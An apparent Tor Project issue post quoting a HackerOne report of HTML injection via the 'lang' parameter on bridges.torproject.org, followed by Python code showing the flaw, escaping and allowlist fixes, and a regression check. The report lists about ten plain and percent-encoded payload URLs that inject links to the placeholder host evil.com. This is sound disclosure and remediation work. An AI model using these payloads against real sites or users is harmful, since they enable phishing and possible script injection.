HTML injection vulnerability with lang parameter
We just got the following email through HackerOne:
Hlo Sir,
I want to report the vulnerability and possible bypass methods ... I found on your site https://torproject.org
This vulnerability is much more HTML injection and possible XSS that may be used by hackers in order to harm others for phishing purposes...
URL: https://bridges.torproject.org/options?lang=anonyks
this is the vulnerable URL where I got my vulnerability,
the parameter is lang= (any string) [here I used AnonyKs]
then the payload used is: "><h1>Giveaway:-P <a href="//evil.am">CLICK ME</a> </h1>
so the URL becomes:
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="//evil.com">CLICK ME</a> </h1>
copy the URL and paste it in the browser
and click on CLICK ME [there 'click me' is shown in three different places and each redirects to evil.com]
You may fix the above vulnerability but still there can be other ways that a hacker can use
so...
Now regarding bypass/other possible ways:
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="%2f%2fevil.com">CLICK ME</a> </h1>
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="http://evil.com">CLICK ME</a> </h1>
now encoding,
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
There are more ways, now they are without the <h1> HTML tag
URL: https://bridges.torproject.org/options?lang=anonyks"><a href="http://evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><a href="//evil.com">Click Me</a>
now again encoding them,
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
Impact
Altogether today I submitted 10 vulnerabilities with possible bypasses or possible methods that an attacker can use for crime purposes..
So to sum up, all URLs are:
Url: https://bridges.torproject.org/options?lang=anonyks"><a href="//evil.com">Click Me</a>
Url: https://bridges.torproject.org/options?lang=anonyks"><a href="http://evil.com">Click Me</a>
Url: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="%2f%2fevil.com">CLICK ME</a> </h1>
Url: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="//evil.com">CLICK ME</a> </h1>
Url: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="http://evil.com">CLICK ME</a> </h1>
Url: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
Url: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
Url: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Impact:
The vulnerability allows a malicious user to inject HTML tags and execute JavaScript, which could lead to stealing the user's session, performing CSRF attacks or opening a phishing page.
Broadly,
When the input fields are not properly sanitized in a webpage, this HTML Injection vulnerability might sometimes lead to Cross-Site Scripting (XSS) or Server-Side Request Forgery (SSRF) attacks
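The root cause described in the report is a `lang` query value reflected verbatim into an HTML attribute, so a `"` closes the attribute and the rest of the value becomes markup. The following is an added illustration, not BridgeDB's own code, of the vulnerable pattern next to two fixes: attribute-escaping the value, and validating it against an allowlist of language codes (the `SUPPORTED_LANGS` set and `LANG_RE` pattern are constructed for this example, not the project's real list). It also shows why the percent-encoded variants in the report are the same bug rather than separate ones: the web framework URL-decodes the query string before the template sees it, so any check has to run on the decoded value.

```python
import html
import re
from urllib.parse import unquote, urlencode

# Constructed allowlist for the example; a real deployment would use its own
# set of supported locales.
SUPPORTED_LANGS = {"en", "de", "fr", "fa", "ru", "zh_CN"}
LANG_RE = re.compile(r"^[a-z]{2,3}(?:_[A-Za-z]{2,4})?$")

# Sample inputs constructed from the payload shapes in the report.
PAYLOAD_PLAIN = 'anonyks"><a href="//evil.com">Click Me</a>'
PAYLOAD_ENCODED = "anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E"


def render_lang_link_vulnerable(lang: str) -> str:
    """The reported defect: the raw query value is interpolated into an attribute."""
    return f'<a href="/options?lang={lang}">Options</a>'


def render_lang_link_escaped_only(lang: str) -> str:
    """Fix 1: attribute-escape the value (quote=True also escapes '"' and "'")."""
    return f'<a href="/options?lang={html.escape(lang, quote=True)}">Options</a>'


def validate_lang(lang: str, default: str = "en") -> str:
    """Fix 2: accept only a well-formed code from the allowlist, else fall back."""
    if LANG_RE.match(lang) and lang in SUPPORTED_LANGS:
        return lang
    return default


def render_lang_link_fixed(lang: str) -> str:
    """Allowlist plus escaping: the query string is built with urlencode and
    then attribute-escaped, so no user-controlled byte reaches the markup raw."""
    query = urlencode({"lang": validate_lang(lang)})
    return f'<a href="/options?{html.escape(query, quote=True)}">Options</a>'


def breaks_out_of_attribute(rendered: str) -> bool:
    """Regression check: the template should yield exactly one <a> tag and no <h1>."""
    lowered = rendered.lower()
    return lowered.count("<a ") > 1 or "<h1" in lowered


def decoded_query_value(raw: str) -> str:
    """What a framework hands the template after URL-decoding the query string."""
    return unquote(raw)


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_lang_link_vulnerable),
                     ("escaped", render_lang_link_escaped_only),
                     ("fixed", render_lang_link_fixed)):
        out = fn(decoded_query_value(PAYLOAD_ENCODED))
        print(f"{name}: injected={breaks_out_of_attribute(out)}  {out}")
```

Escaping alone keeps the reflected string inside the attribute; the allowlist additionally stops unknown values from being echoed at all, which is the better default for a parameter that only ever needs to hold a locale code.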